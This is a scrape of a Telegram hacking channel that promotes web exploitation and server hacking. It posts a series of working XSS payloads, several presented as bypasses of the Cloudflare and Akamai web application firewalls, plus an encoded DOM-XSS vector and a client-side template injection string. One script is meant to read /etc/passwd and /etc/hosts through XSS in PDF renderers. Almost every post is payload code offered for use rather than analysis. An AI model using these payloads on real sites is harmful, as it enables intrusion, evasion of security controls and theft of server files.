0Day.Today | Learn Exploit | Zero World | Dark web |
@LearnExploit
18.7K subscribers
1.23K photos
123 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
About
Blog
Apps
Platform
Join
0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
0Day.Today | Learn Exploit | Zero World | Dark web |
👁‍🗨 You probably know that

👩‍💻 <Img Src=javascript:alert(1)>

🚫 Doesn't work anymore (although several lists out there have it)

🔄 But if you add

👩‍💻 OnError=location=src

It does!

👁‍🗨 Example:
https://brutelogic.com.br/gym.php?p05=%3CImg+Src=javascript:alert(1)+OnError=location=src%3E

⚠️ Not so useful but who knows your next inline injection scenario?

#XSS

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍922❤‍🔥1
3.03K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Akamai WAF

&lt;A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)&gt;

Vector PoC

#xss #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
5🔥2👍1
3.82K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
43🔥3👍1
3.92K views
0Day.Today | Learn Exploit | Zero World | Dark web |
CloudFlare Bypass

&lt;Img Src=OnXSS OnError=alert(1)&gt;

#Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
111
4.22K views
0Day.Today | Learn Exploit | Zero World | Dark web |
Cloudflare WAF Bypass Leads to Reflected XSS ®️

Payload Used : "&gt;&lt;img src=x onerror=alert(1)&gt; [Blocked By Cloudflare]

Payload Used : "&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt; [XSS Popup]

#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥42👍1👎1
3.86K views
0Day.Today | Learn Exploit | Zero World | Dark web |
XSS to Exfiltrate Data from PDFs 🔥🥵

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>

#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
5👍5👎1
3.08K views
0Day.Today | Learn Exploit | Zero World | Dark web |
bypass XSS Cloudflare WAF

Encoded Payload:

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

Clean Payload:

"><track/onerror='confirm`1`'>

HTML entity & URL encoding:

" --> &#34;
> --> &gt;
< --> &lt;
' --> &#x27;
` --> \%60

#Bypass #XSS #WAF
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥8👍4
3.05K viewsedited  
0Day.Today | Learn Exploit | Zero World | Dark web |
XSS of the day : DOM-XSS-SiteMinder

Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e

Nuclei tamplete

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
6❤‍🔥3
2.59K views
0Day.Today | Learn Exploit | Zero World | Dark web |
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background

Payload :

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

#Payload #xss
——————‌
0Day.Today
@LearnExploit
@Tech_Army
🔥321❤‍🔥1
3.88K views
0Day.Today | Learn Exploit | Zero World | Dark web |
XSS WAF Bypass One payload for all 🔥

Link

#xss #Payload
——————‌
0Day.Today
@LearnExploit
@Tech_Army
2👍1
3.15K views